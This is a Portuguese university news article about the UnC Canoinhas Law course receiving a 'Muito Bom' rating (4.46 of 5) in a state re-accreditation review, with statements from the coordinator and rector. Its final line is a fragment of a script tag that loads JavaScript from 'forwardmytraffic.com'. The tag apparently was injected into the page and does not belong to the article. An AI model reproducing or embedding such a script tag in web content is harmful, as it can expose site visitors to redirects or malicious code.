O Curso de Direito da UnC, Campus de Canoinhas, recebeu a avaliação in loco da Comissão Externa do Conselho Estadual de Educação de Santa Catarina para a renovação do reconhecimento do Curso.
Os avaliadores, Profa. Larissa Miguel Silveira e Prof. Flaviano Vetter Tauscheck, conceituaram o curso como “Muito Bom”, com a nota final de 4,46 (máximo 5). Entre as áreas de destaque que receberam a nota máxima – nível de excelência – estão as políticas institucionais; a estrutura curricular; apoio ao discente, ações de avaliação do curso e experiência do corpo docente. Na Infraestrutura, os avaliadores destacaram que o acesso dos alunos a equipamentos de informática é atendido de maneira excelente, incluindo a quantidade de equipamentos, acessibilidade plena, velocidade de acesso à internet e espaço físico. O Núcleo de Prática Jurídicas (NPJ) também atende de forma excelente as demandas do curso, segundo a comissão.
A Coordenadora do Curso, professora Danielly Borguezan, disse que o resultado desta avaliação – de um curso que existe há 20 anos na região – reflete o comprometimento da tríade “docentes, discentes e gestão”. Além disso, a avaliação mostra a evolução do curso, que passou de um conceito de 3.35 considerado suficiente, para 4.45 “Muito Bom”. “A busca pela excelência é nossa meta”, enfatizou.
A Reitora, Dra. Solange Sprandel da Silva, como advogada, destacou que a nota final de 4,46 (máximo 5) é o resultado da dedicação dos professores ao longo da trajetória do Curso e da qualidade dos estudantes de Direito, com destaque para a estrutura dos ambientes como salas de aula, NPJ e laboratórios. “Temos a convicção, enquanto gestores, que esta é a melhor maneira de contribuir com o desenvolvimento, preparando os nossos acadêmicos para atuarem com eficiência e fazerem a diferença na sociedade”, observa a Reitora.
… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>